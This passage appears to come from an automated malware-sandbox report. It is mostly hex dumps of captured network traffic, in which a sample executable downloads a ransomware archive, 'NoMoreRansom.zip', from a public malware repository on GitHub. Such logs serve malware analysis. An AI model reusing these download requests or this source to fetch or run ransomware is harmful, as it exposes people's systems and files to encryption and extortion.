                                                                                                                                                2022-09-29 12:51:21 UTC1169INData Raw: 89 4f 0e 02 30 8e 80 58 34 85 06 20 67 88 7a 4a 60 ca 65 1f 4a d8 fc 72 0c 7e 6d 05 1b e6 95 51 87 a3 00 48 ea 75 49 f2 20 59 3b 74 55 08 be e1 b4 90 82 8d d2 6d 2b 50 02 f8 12 c4 5d 62 44 23 be a5 01 03 31 ac 33 53 68 bd 4d e1 66 c1 cc b6 95 16 c5 1f dc 49 61 02 aa e5 aa 82 d4 e6 59 8e c1 cc 54 90 c6 be d7 0a 0c 2f 6a e7 98 31 23 fc 36 83 21 a8 e4 31 ea eb c7 42 47 03 bb 62 db 44 d2 e7 6d 8f 1f 52 fc 20 a8 a0 1d 00 ae 69 03 90 e9 88 d6 f3 52 4f a7 3c f3 22 6f e4 a0 94 1c 08 d4 bb 00 5e d6 2e e5 ab 8e d6 04 d1 24 95 2d 51 49 97 5b 19 3a d7 c0 2f 33 fe 25 23 5c a3 2a bb 20 cb d5 ea 09 ca 48 b0 25 04 c0 18 f7 e6 b5 17 35 9e 40 a9 63 8c 00 cf f5 d5 c0 2b 87 b4 5f 72 4f 0a 62 4c c6 cf 7c 71 bf 5c 88 0d ae 14 25 04 24 7b 55 91 b7 44 67 fc 75 6b 08 d3 4a b6 43
                                                                                                                                                Data Ascii: O0X4 gzJ`eJr~mQHuI Y;tUm+P]bD#13ShMfIaYT/j1#6!1BGbDmR iRO<"o^.$-QI[:/3%#\* H%5@c+_rObL|q\%${UDgukJC
                                                                                                                                                2022-09-29 12:51:21 UTC1170INData Raw: dd c7 f0 a9 f7 87 06 13 35 ad c2 9b 66 ed 16 a6 ad c9 76 77 ec 46 64 1f 00 4d 8a ca 25 d1 f2 af 47 e2 f1 63 2a 75 ed af 71 73 4d 75 d6 f9 77 7c 22 28 26 44 91 86 9d fd 1b db 54 26 8c d7 22 e5 a6 f9 b6 7c 66 09 0f 76 27 ae fc 3b 6b c2 f0 61 52 54 3a af cf 86 4d 02 b3 69 17 0e 4f 5b 15 2d b6 dd d6 67 75 2d f1 28 f1 b1 fb bd a0 8e 23 8d 5f 1c f0 fa e2 82 a0 db 70 56 7a 3b 54 e5 cf b5 ad b3 eb 37 5e b6 79 b6 a7 e2 19 2a 14 0f 1b 19 14 8b 8c d4 1b 6b 34 6a 67 51 95 50 58 09 ef 5f 36 c7 0b d5 e5 9d 76 f7 5a d2 f7 4a 24 51 d4 0c 0d e7 e5 6b 60 46 65 8a a6 b4 a1 0b 31 a7 2b b3 2d 9d a1 ab 3f c6 75 15 e8 1d 39 b8 07 85 42 c8 5b 8b 78 95 73 d8 9f 8b 86 dc fc 72 28 4d d1 e8 c0 1f ff a7 8e bc 6d 2a 9c 75 47 ef 9f d3 a2 15 5a 4b 91 7a 99 a9 dd 58 f5 ef 3e f9 f5 a4 08
                                                                                                                                                Data Ascii: 5fvwFdM%Gc*uqsMuw|"(&DT&"|fv';kaRT:MiO[-gu-(#_pVz;T7^y*k4jgQPX_6vZJ$Qk`Fe1+-?u9B[xsr(Mm*uGZKzX>
                                                                                                                                                2022-09-29 12:51:21 UTC1171INData Raw: 2c 43 dd be a8 19 69 ac fd 36 14 dd 41 cb de d8 c2 e4 8d 17 03 85 be 1e 44 84 98 f2 b3 06 cb 2e 88 77 34 ca 41 f3 83 c8 4c d0 1b 63 73 00 99 ff 6a fa d4 0d 72 de 4a b2 41 e0 c3 88 c5 2a 48 ce 28 d4 3a 7f 17 38 06 41 e4 0e 23 01 b1 18 43 06 39 b5 8b d2 74 4c 4d 3e da 3a f0 25 65 13 0e 18 ab b9 b0 bc 7f 0f d4 d3 cd 67 65 c6 9e cf 52 40 82 35 37 cf cb 28 dd 28 e2 e0 b1 d9 1f 77 03 c2 76 d0 de 31 ba a6 89 2e 71 cc ce 75 33 3b 80 f3 e8 2c ef 1c e0 d3 db 88 23 e1 b7 99 1d 45 9d 1f 26 f3 3f 6c 95 79 b1 85 85 e2 b7 95 17 7b c5 39 8a aa 48 3b 6b dc bb 8f 23 ac 9d 86 cb 97 2a 40 8f 48 0e 42 c3 82 36 19 7c 4e e3 b2 9f 51 7c 2c bf 18 0a 99 0a 33 99 99 13 84 7e 2b 86 f8 26 42 1b 72 9b 0c b6 d0 6d 29 55 b4 63 16 cf 06 87 75 10 31 2b e5 ba af d1 2e ec c8 ce 8b ab dc 96
                                                                                                                                                Data Ascii: ,Ci6AD.w4ALcsjrJA*H(:8A#C9tLM>:%egeR@57((wv1.qu3;,#E&?ly{9H;k#*@HB6|NQ|,3~+&Brm)Ucu1+.
                                                                                                                                                2022-09-29 12:51:21 UTC1173INData Raw: f3 4c 99 98 b5 a9 f4 43 30 44 22 4d 41 9a fb 99 7a 03 7e d7 83 68 ed 8d 50 e0 d1 af 66 a8 0a 65 99 44 4c 1b 94 e4 d1 35 71 c0 0c 16 1c 19 33 d9 af be 3a fb 99 ba 96 de ba 1e bd fe d1 b9 1e f3 b5 08 b3 a2 ac 5d 61 06 84 b3 47 5d c8 f3 d9 12 e1 1f 62 f2 7f ee d5 e7 d9 58 e6 63 5e b8 6c ed f0 0f b0 a9 f4 bf 77 c8 54 b1 f9 26 3a 73 01 8c bc 48 87 9c 31 47 b9 1a 3c b8 61 18 bc 13 c9 f6 a6 fb 56 2d 77 4c b8 a0 26 33 65 42 d4 9c c2 57 f6 dc 18 8f 02 d2 89 0b 2f bf 70 db 58 2f 89 8d 10 7c e4 19 9f 66 8b 2c 86 48 77 ab 66 55 db b5 61 7c ba 51 87 10 76 0b b4 82 2a 38 d2 ed 0d 33 1e e6 2f f3 2f 91 28 63 1d 36 68 96 e5 e9 b9 34 83 ba 4a 4b 0e 9b fe c8 11 f6 ca 90 72 fc 99 b7 47 57 5a 02 0a 2d 62 ab de 88 46 be 43 25 92 c7 c9 c0 6b e4 cd 16 1e da 3d a6 66 57 0f 82 41
                                                                                                                                                Data Ascii: LC0D"MAz~hPfeDL5q3:]aG]bXc^lwT&:sH1G<aV-wL&3eBW/pX/|f,HwfUa|Qv*83//(c6h4JKrGWZ-bFC%k=fWA
                                                                                                                                                2022-09-29 12:51:21 UTC1174INData Raw: 42 4b cd 96 a8 d6 09 13 d9 09 1e 0f 37 cd 18 fd 12 66 bb 91 60 de d4 4f 69 62 1d 08 88 33 24 97 9b b1 18 8b 52 4c 8f 20 fd d1 95 cf d4 a3 3f bd 8d ae 2e 24 c5 f8 ab 9c fe 64 d1 88 a4 90 38 94 d6 e5 34 d5 a9 af 25 ab ea 70 72 74 12 2a b5 1e 65 cb a2 79 43 d4 2d 71 5a a2 b6 39 8c 01 29 5e b8 10 79 e1 2a 5e de 87 4c 63 f5 c7 43 f3 ce 4d 57 e2 9b ee 04 3d cb 0c 39 ee cf c9 90 18 f7 7e 4f b2 88 d1 c3 0c fc 14 e3 d4 87 e2 b7 0a f8 c1 a3 5f 3d 42 5e d9 14 4b f9 d5 b3 06 7b 10 42 15 fa ce ce 5c e6 58 8a b6 4a ec 06 b1 86 31 0f 0a d1 e4 60 c5 31 7a 4d d7 5a 27 56 64 90 0d 61 ae 82 a5 46 f7 54 10 d4 a1 32 20 0c 1e 97 75 e6 47 59 ae 66 b4 d3 9e 71 97 51 67 c1 a9 6c e8 0e 2c ea 0f ce f2 2b c2 37 f6 e8 56 6c d4 54 16 88 0b da 8c cc 62 6a 8d 07 4e 7b 2b d1 eb fe bd 35
                                                                                                                                                Data Ascii: BK7f`Oib3$RL ?.$d84%prt*eyC-qZ9)^y*^LcCMW=9~O_=B^K{B\XJ1`1zMZ'VdaFT2 uGYfqQgl,+7VlTbjN{+5
                                                                                                                                                2022-09-29 12:51:21 UTC1175INData Raw: 49 30 4f 0c 42 80 b7 f7 19 9d be cc 46 67 7f b2 65 f9 08 7e 0e 18 7d 8d 31 0a 50 d3 2a 7a 72 40 3e a1 84 71 fe 44 6d 96 e0 79 79 49 23 40 1f 12 38 77 7a 90 66 b8 a5 f0 f6 b6 f1 99 8d 40 ce 58 c3 ab 6f 96 d3 4a a8 c2 fa 8e 23 9d e4 6c 1c 96 bd bc f5 8a 42 99 b7 d8 1e 53 64 14 a9 c0 de af 43 b8 0c 30 d1 e8 e7 24 71 f4 85 04 a7 96 2e 34 23 d3 49 ce 85 b6 8b 68 08 3d 0f 58 8d ac 88 7d d1 50 d6 ee d1 39 e7 33 d3 dc 4a 32 7f 44 cb 26 56 09 57 56 49 c6 e6 c7 78 25 5e a1 3d 29 95 05 ce 74 f9 73 23 41 35 a2 c4 e3 ad e1 c6 6b dd 46 b4 89 95 33 9f a9 72 fa 8e d4 41 8e 55 b4 f9 6f 4f 71 c3 c0 97 88 1b 31 2e a1 62 ec ac 7f fc f0 33 06 8e 13 d0 6c 84 92 a1 69 d1 ba 31 2d ff 3c 89 17 19 25 ce a1 c6 1a 70 ed 9d 9b 6d e3 68 cd 49 f0 db 43 15 5f ab 55 9a fb 6b 65 3d 86 1b
                                                                                                                                                Data Ascii: I0OBFge~}1P*zr@>qDmyyI#@8wzf@XoJ#lBSdC0$q.4#Ih=X}P93J2D&VWVIx%^=)ts#A5kF3rAUoOq1.b3li1-<%pmhIC_Uke=
                                                                                                                                                2022-09-29 12:51:21 UTC1177INData Raw: 5b 84 4f b9 5f 7f 21 0b aa 48 14 92 9f ee a9 a2 68 03 bf 5f 63 56 80 84 93 86 87 43 cc 56 2b 83 88 a1 8f f4 8e fb 24 12 8c 0e 29 e1 a6 45 89 ae bc 40 8a a8 12 b0 a1 81 e1 2b c9 7d b9 3a 10 85 d2 c8 50 81 71 e3 41 5a 78 e6 f1 6f 28 ca ce f5 fc 26 91 ae 88 1a a2 91 bb 4b ac 72 f6 f6 1d ea 4d 71 c8 31 91 63 ba 34 db 2d a3 46 d8 b6 5f ac 43 71 ef cb 5b 5d bf a6 5d 15 db a0 98 6b 68 93 c4 15 10 66 fb 40 e1 31 1a ad 53 6a 71 f9 91 64 18 90 db 92 bf 6e 0a f0 b6 a8 55 c3 aa 59 0d f6 0b ce f4 ff 47 21 73 43 df 0a 14 b6 d6 ea cb c4 b3 46 76 59 0c 31 f4 82 e4 70 04 d7 b6 b0 28 de 16 03 2f 47 51 98 35 16 d7 2a ea 83 88 c6 81 f2 ca 8d ff 03 e6 9d dd be f1 3b 5a d7 3f e4 28 7f d3 fd 10 0e de ee ce fc d6 f9 af 35 66 c8 63 ce 34 2d 1e 63 dd 1f 70 22 a1 78 f0 a8 77 e6 74
                                                                                                                                                Data Ascii: [O_!Hh_cVCV+$)E@+}:PqAZxo(&KrMq1c4-F_Cq[]]khf@1SjqdnUYG!sCFvY1p(/GQ5*;Z?(5fc4-cp"xwt
                                                                                                                                                2022-09-29 12:51:21 UTC1178INData Raw: 69 06 43 75 c0 71 a4 bd cd eb cd f5 d7 d0 aa 7e 02 b4 bd ff a9 c1 e0 71 bb 06 ec 1a 5e fa 01 7e 5d 9c d5 ee 25 90 c8 0a f8 f7 5c f5 99 34 c0 e3 ba 5a ff 24 0d c6 be b5 4d 36 ec fd a4 c3 6d 94 6e 7c 43 0e 2d 61 a7 70 21 61 80 bc 33 3e 0e a6 14 ee c9 7d 06 d4 be 19 c6 3b 76 a0 3a e5 ed 0b 8e 5a 1c 0d 21 78 be ce b8 e4 85 bd 13 09 05 bf 9b 89 e5 9c c2 2d fd f3 bf 7a 70 10 57 fd 4d d8 48 ce fb 92 10 67 04 1e e8 08 c7 95 a5 5e e5 4b 55 61 f7 1a aa d1 40 e5 ef d5 b8 f0 3d 1b b3 14 7e 86 29 d9 d8 72 5d 09 5e 96 8f e1 c9 21 ed 50 e4 e1 db 86 27 4c b9 54 b5 8b e5 77 9f 12 5b 8d cc 83 4e 6c bf f9 10 a0 10 97 be e3 d9 39 b1 08 31 d8 b6 f7 8c ce f2 24 65 a1 12 5f 03 a7 0d e5 15 ce af 6c b1 ee e3 68 63 e4 58 c7 30 d2 4c 66 0a c8 dc da d0 e8 84 ac f6 cf af 62 77 b6 24
                                                                                                                                                Data Ascii: iCuq~q^~]%\4Z$M6mn|C-ap!a3>};v:Z!x-zpWMHg^KUa@=~)r]^!P'LTw[Nl91$e_lhcX0Lfbw$


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                14192.168.2.549714140.82.121.3443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:23 UTC1179OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/NoMoreRansom.zip HTTP/1.1
                                                                                                                                                Host: github.com
                                                                                                                                                2022-09-29 12:51:23 UTC1179INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:14 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/NoMoreRansom.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:51:23 UTC1180INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                15192.168.2.549715185.199.108.133443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:23 UTC1182OUTGET /Endermanch/MalwareDatabase/master/ransomwares/NoMoreRansom.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                2022-09-29 12:51:24 UTC1182INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 938498
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "a8e6304ff5320ec60c4e2f8e3ebb31e42a5adf4691dfa4eaa6f24b4dad08bbfd"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: D4EA:67BC:3D674:FA8B9:63359346
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:23 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6968-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455884.669077,VS0,VE321
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: 023f3c87cc1be354015dcbc9c827500c10953499
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:56:23 GMT
                                                                                                                                                Source-Age: 0
                                                                                                                                                2022-09-29 12:51:24 UTC1183INData Raw: 50 4b 03 04 14 00 01 00 08 00 98 82 ba 4a dc 69 b2 15 46 51 0e 00 00 ca 15 00 1b 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 4e 6f 4d 6f 72 65 52 61 6e 73 6f 6d 2e 65 78 65 b5 26 50 b8 1f d7 f7 5c 00 a2 4a af d9 76 74 a7 44 28 27 ef 18 69 bb ab c2 21 d8 7d 8d cf 83 56 8f 2f be 64 10 fd 69 17 eb d0 5e f2 d1 6a a5 9a e0 56 c4 b3 e4 ff ef a6 06 ea d6 bb 64 6b 3f ea f9 6f 23 d2 9f e5 e4 cd 7d d2 36 bb 46 c8 f4 08 1a 00 0f 17 49 5a 2b cf 96 7e c2 48 0e 6c 80 6f ea ba 11 a3 fc ab 7a 93 b5 f5 72 91 10 54 4a a5 5e c7 31 ec 37 cb 13 62 26 42 d9 40 f7 43 ab dd a9 a1 a0 e4 29 c6 f9 df 33 34 5d 1a c8 97 96 7e cd dd d4 6d d2 f7 59 b8 fe 1d 7d fb 12 f3 50 a2 72 b6 cf dc 3e fb 7a ff 18 09 a8 c1 22 05 34 54 9a 3e dc 1b c6 15 06 cb f9 a0 a0 5c 0d b6 3f e9 b8 c9 45 cc d1 03
                                                                                                                                                Data Ascii: PKJiFQEndermanch@NoMoreRansom.exe&P\JvtD('i!}V/di^jVdk?o#}6FIZ+~HlozrTJ^17b&B@C)34]~mY}Pr>z"4T>\?E
                                                                                                                                                2022-09-29 12:51:24 UTC1184INData Raw: 8f 51 ef 9a 13 32 e0 6a a5 1c 6b 8d 46 dd 80 f7 0c e0 e9 06 3b cf b7 80 a4 34 00 f1 dd ce dd 89 6e 16 17 14 27 c1 30 7f 09 bb 51 a7 68 10 82 fe d7 fa 10 d7 6b 77 5b 29 43 95 99 55 67 17 40 c8 01 3f 1f af fd a3 06 32 78 b4 d9 6e 50 8a 94 c5 0b 1b 29 d4 e9 03 c6 25 75 0a 65 61 97 53 a3 e6 25 7f c9 41 49 8b f5 b4 52 ca 0e 29 28 09 b6 54 ce a0 07 26 20 4d 23 76 df 0f 91 b9 dd 85 a7 17 cc 9c 09 83 cd 3b cc 7f 75 86 42 7f 7c ae 89 e9 11 fe 37 49 60 9a 92 b3 e9 0a 85 c2 84 66 96 43 a0 08 e9 12 f1 86 29 d1 fd 6d 11 b2 72 9c 2c e1 7f 6c 2e 5d 33 f3 da 43 5a 42 44 78 67 70 a0 0c 88 27 21 85 23 32 c0 80 e8 60 89 cb e5 f9 0f 3a ef d7 cf c3 fe 77 54 63 2b 65 20 2c 6a f1 d5 6b 00 2b 21 1c 35 9c 2f ba 21 21 c4 b8 e5 2e 17 2f 63 72 e8 f1 e4 22 80 e9 03 f5 df 52 88 7c bf
                                                                                                                                                Data Ascii: Q2jkF;4n'0Qhkw[)CUg@?2xnP)%ueaS%AIR)(T& M#v;uB|7I`fC)mr,l.]3CZBDxgp'!#2`:wTc+e ,jk+!5/!!./cr"R|
                                                                                                                                                2022-09-29 12:51:24 UTC1185INData Raw: c9 bb 93 d4 21 ae db b3 7e f7 5d 47 1d 3b 97 c6 0c 89 72 5a 63 6f a4 f9 4a 0a 94 ef 4d 42 e8 5e 8e 00 62 2b 24 56 5f d6 79 ab 67 88 e8 da 2e 3b ca a5 49 ab c0 03 71 fd ef a2 3c c0 89 6b ba a7 75 69 60 86 e7 f2 75 60 d5 10 06 08 59 3e c8 98 76 f8 16 2b 63 32 36 e5 f8 a2 bd ad 58 26 0b 65 7d 72 07 a1 f3 cc e2 19 d8 1e 54 2e 04 34 9a ce 8b d9 ed 8f eb e7 f5 9d ef 34 87 81 3c 62 3d 4b e2 80 e7 c2 e4 13 fa bf 55 9c b9 2b df 54 c4 62 4d 80 3c 7a c7 7e ff d9 4c 54 8d df f4 12 1b ad ef 59 f6 52 09 e4 7f c1 17 57 82 07 2f 7b 30 82 e7 77 37 a0 2e 76 65 2c 9c f2 c4 f3 5a fd 0d 7d 42 bb 26 d7 c8 c9 2e 1f 03 4a 42 ba bf 24 d1 85 13 64 01 46 d0 04 24 ab 34 cd ae 7b 01 90 85 45 e9 07 65 96 ef 2a c6 5d 42 5a bc cd 5a 8d 1b 84 c2 03 d4 79 37 9f 3a 91 ec 39 7a 64 42 6a 97
                                                                                                                                                Data Ascii: !~]G;rZcoJMB^b+$V_yg.;Iq<kui`u`Y>v+c26X&e}rT.44<b=KU+TbM<z~LTYRW/{0w7.ve,Z}B&.JB$dF$4{Ee*]BZZy7:9zdBj
                                                                                                                                                2022-09-29 12:51:24 UTC1187INData Raw: 98 b9 e5 68 92 db 22 0b b1 fa 44 78 da 49 85 45 85 17 60 35 10 c6 09 55 93 f7 24 4f ea ee 81 7c 8c 8a 0e f9 8a 94 96 cd 94 70 2e ae 14 70 60 ca e9 b6 89 56 a9 e9 f6 9c ff f8 f1 93 80 46 9c 86 ef 5a 05 41 02 64 14 08 73 07 99 b9 97 1a 8c 78 9f d8 1a 0f 0a da c4 dd 91 36 30 11 a8 17 b2 cf 5c ff 1e 84 e9 7b 2d 26 93 dd 77 34 5b 6e 5f f7 5e 64 14 8d 31 57 21 c2 99 fe 03 87 2d 9f fd 7f 15 a6 c5 9d ba 81 6d a0 b9 d2 bc 29 81 a5 25 bf ce 3a 91 cd 44 61 c1 8d ef be 1d b7 20 69 6d 2c 9d d2 f0 cf 51 00 d4 2d 1d 5e c6 dd ac 4f 43 3e c1 12 31 b3 8d 39 e1 fb 85 2b 32 d7 65 0b 8c bb ef cb 71 4b fa ba 96 1c 1d 25 85 25 e2 28 4b 43 db 04 43 84 5a 53 94 88 f5 14 40 55 70 6d 3d 8c cc d2 bf 89 06 df 49 26 4f f6 ce f7 7f a1 77 f1 a1 43 2c 89 2c f3 78 57 95 25 cb 51 0f fb 57
                                                                                                                                                Data Ascii: h"DxIE`5U$O|p.p`VFZAdsx60\{-&w4[n_^d1W!-m)%:Da im,Q-^OC>19+2eqK%%(KCCZS@Upm=I&OwC,,xW%QW
                                                                                                                                                2022-09-29 12:51:24 UTC1188INData Raw: 4c 76 fd dc 1f 9a 93 13 0a be e6 c1 77 55 d5 4c c0 38 6f 8c 40 c0 46 87 2f 32 7a 6a b6 9c 83 80 6b 29 75 8c a9 89 78 27 0e a9 2a 7d 4d c0 31 0f 34 c2 33 f4 03 c1 78 34 7a 0b bf b8 b0 94 4a 9e 3d 62 a1 05 32 e7 2b db 0a c0 1b 75 0b 89 4e fa 4b 13 06 12 9b 96 4e d0 45 c7 df a3 c3 0c 5f d0 1c 2d 8b 06 7f af 9f e6 d5 09 fb 15 05 40 04 68 f7 4f 97 97 30 5c 58 00 71 1a 23 b6 b0 5e 81 e6 0d e6 ad 82 fc 3a ea 40 f8 07 87 6a 9a fe 1c 44 63 a1 ba 6e a0 ea 24 de 20 08 49 62 fd e7 ee e4 09 bf f2 b7 87 b8 a6 a1 3e 06 2f c7 47 c2 90 df 50 47 88 9e 31 a6 d4 2e 18 20 54 bc 4b 1f d8 c7 fb 93 31 4d 2b a2 62 5c e8 c0 10 33 e3 4b a4 c7 3b 3a d6 4e a7 9f 5e 17 18 a6 d8 fa 9a 2f b8 98 ad ee 89 e9 34 2d d5 e9 36 49 31 b2 be 37 82 42 1d 7a 28 0a 04 57 0d 33 9b c0 8d f5 7c 1f e5
                                                                                                                                                Data Ascii: LvwUL8o@F/2zjk)ux'*}M143x4zJ=b2+uNKNE_-@hO0\Xq#^:@jDcn$ Ib>/GPG1. TK1M+b\3K;:N^/4-6I17Bz(W3|
                                                                                                                                                2022-09-29 12:51:24 UTC1189INData Raw: 84 ba ea 78 a2 22 8b 60 1e 4a 78 a8 c8 05 7e fc 3d 96 4c 66 f6 62 40 6e 89 d1 60 55 13 9c b0 69 e8 fd 06 cd 85 a4 e8 29 16 10 7a 9b 1e 77 bc 36 f8 00 62 f9 c0 da b4 30 b5 2f 66 c5 6d 6f 91 b2 33 83 d1 11 17 64 1a a2 0d a8 65 fc 1c 59 0c e6 33 f5 2b 38 1c 84 be cf 4b 36 07 9c 7a de 66 d1 4b fc 4b 3d 99 b1 4b 75 18 f0 d2 2a 0c a2 15 f4 be 9f 26 a1 92 2a b7 73 47 29 1b 5e 40 52 d3 c4 2e a0 89 4f 24 8f ef a4 62 58 d1 56 01 c9 24 91 7a 6a b1 fc 02 93 6b 4e e8 7f 7e 4d 63 e0 b8 74 c6 6e 3f bc 05 a3 54 95 ad ee 20 3f 20 38 a0 74 7c 91 7c 86 e3 5c 8a 03 fd 88 f7 48 b3 1d 44 6d 9d 83 e6 04 6a 96 ae a4 7f 2a 01 ff ff fa c7 a4 50 a7 33 6c f2 f3 40 c3 3e 8c 47 d6 b0 bc dc 5b 83 20 92 6a 6d 13 de ec 5a 96 46 a6 7b 08 60 fc fb ad 5c d8 47 8f ef 26 ea 41 37 49 84 72 d9
                                                                                                                                                Data Ascii: x"`Jx~=Lfb@n`Ui)zw6b0/fmo3deY3+8K6zfKK=Ku*&*sG)^@R.O$bXV$zjkN~Mctn?T ? 8t||\HDmj*P3l@>G[ jmZF{`\G&A7Ir
                                                                                                                                                2022-09-29 12:51:24 UTC1191INData Raw: 9d 8b 6c 4d a1 e7 92 17 e9 e7 16 fd 24 fa 64 fc d4 91 c9 12 8c 1c 56 44 8b 30 53 5e 41 2e b6 2c d3 fb cb 49 e9 61 f1 b0 6a 49 59 c6 77 29 60 7f 35 f7 23 e0 90 58 d9 b5 9f 1b 22 1f 19 8b f3 77 33 9f 8b fc b6 7b 69 89 bd 69 42 65 b5 26 39 fc 1a e2 ff f2 19 cd 39 a4 c4 3f 5d b7 df 8d 32 e0 c4 ed bc 8c 76 70 e3 3f 51 1e c6 ec 23 69 f5 90 92 90 79 28 76 e4 da 91 8e 17 49 a2 b1 75 16 ee 69 ab 25 3a b0 ee aa 07 ee 81 c8 22 6e 65 38 52 bb a1 d7 ca a8 2c 24 e8 a0 14 98 8d 52 f8 c8 b4 f4 c9 0e d5 9a ba 66 50 b6 8d c3 95 78 79 b6 94 b0 4f 7c f1 f7 62 4a a8 63 89 78 40 98 fe f2 f9 72 17 9f 00 96 f7 76 03 37 58 7a 44 b9 58 85 77 92 6e 3e e4 96 ec 07 2d f7 4a f5 2c 6d cd 5e 92 e0 d5 b7 a8 62 4e bb 41 a3 da 7c ff 64 8f 2b 6f e6 bc 7d ac 7d 2b 45 e1 bc 38 c2 f6 45 62 c8
                                                                                                                                                Data Ascii: lM$dVD0S^A.,IajIYw)`5#X"w3{iiBe&99?]2vp?Q#iy(vIui%:"ne8R,$RfPxyO|bJcx@rv7XzDXwn>-J,m^bNA|d+o}}+E8Eb
                                                                                                                                                2022-09-29 12:51:24 UTC1192INData Raw: 67 54 d1 f2 15 cc 49 f1 b9 b7 d5 65 3d 3d c7 34 00 39 ac 3b 3a 26 d9 f6 20 ca 6b f2 26 40 8b bd 4f 85 9c 95 2a 0f 15 82 aa 2e 92 0e 04 75 a1 52 73 42 a5 c3 a3 0e 9b f4 94 74 a0 1c ea b4 0e 4d 3b 81 c0 30 94 c1 6d 4a ad e3 60 32 c0 97 7a 18 82 c1 bb 60 bb 36 47 c1 96 2a 51 c1 de 58 52 7d bb eb 6f 8f ef dc 64 64 75 d7 e9 f5 7c 94 90 2e 84 c2 68 98 43 d9 59 7c 7e 48 49 8c 2b 11 44 ac 39 11 16 b6 d7 40 80 2d 46 b5 8b 4f 0d 24 f8 dc b1 1a 14 13 a2 dc 76 97 57 0c 22 e8 ce 48 fe 19 e8 0e 8f 7c 32 d4 28 53 78 8c db a6 a3 c8 14 19 cb cc ce d8 02 56 d8 50 59 27 74 19 97 24 6f a8 51 5d 46 75 a4 68 87 2d 9a 71 e9 5b 6a 29 23 47 09 f1 42 39 5a 50 52 84 d3 c2 3b 77 b6 d6 19 bf 76 b7 d3 f1 07 cb 3b c3 1b 64 1d 5d fd a0 0f 7c 0e 9c f4 fb 0c 9a 7a 72 f3 89 92 8e 7b 65 42
                                                                                                                                                Data Ascii: gTIe==49;:& k&@O*.uRsBtM;0mJ`2z`6G*QXR}oddu|.hCY|~HI+D9@-FO$vW"H|2(SxVPY't$oQ]Fuh-q[j)#GB9ZPR;wv;d]|zr{eB
